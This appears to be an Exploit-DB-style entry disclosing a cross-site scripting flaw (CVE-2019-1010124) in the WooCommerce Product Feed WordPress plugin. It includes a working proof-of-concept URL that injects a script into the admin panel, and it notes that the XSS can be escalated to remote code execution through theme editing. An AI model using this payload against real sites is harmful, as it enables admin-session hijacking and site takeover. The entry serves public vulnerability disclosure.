b4225f5fa8
12 changes to exploits/shellcodes SQL Server Password Changer 1.90 - Denial of Service Easy MP3 Downloader 4.7.8.8 - 'Unlock Code' Denial of Service Asus Precision TouchPad 11.0.0.25 - Denial of Service VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service Canon PRINT 2.5.5 - Information Disclosure QEMU - Denial of Service Sentrifugo 3.2 - File Upload Restriction Bypass Sentrifugo 3.2 - Persistent Cross-Site Scripting DomainMod 4.13 - Cross-Site Scripting YouPHPTube 7.4 - Remote Code Execution WordPress Plugin WooCommerce Product Feed 2.2.18 - Cross-Site Scripting
17 lines
No EOL
788 B
Text
17 lines
No EOL
788 B
Text
# Exploit Title: WordPress Plugin WooCommerce Product Feed <= 2.2.18 - Cross-Site Scripting
|
|
# Date: 30 August 2019
|
|
# Exploit Author: Damian Ebelties (https://zerodays.lol/)
|
|
# Vendor Homepage: https://wordpress.org/plugins/webappick-product-feed-for-woocommerce/
|
|
# Version: <= 2.2.18
|
|
# Tested on: Ubuntu 18.04.1
|
|
# CVE: CVE-2019-1010124
|
|
|
|
The WordPress plugin 'WooCommerce Product Feed' does not correctly sanitize user-input,
|
|
which leads to Cross-Site Scripting in the Admin Panel.
|
|
|
|
Since it is WordPress, it's fairly easy to get RCE with this XSS, by editing the theme
|
|
files via (for example) XHR requests with included Javascript.
|
|
|
|
Proof-of-Concept:
|
|
|
|
https://domain.tld/wp-admin/admin.php?page=woo_feed_manage_feed&link=%3E%3Cscript%3Ealert`zerodays.lol`;%3C/script%3E |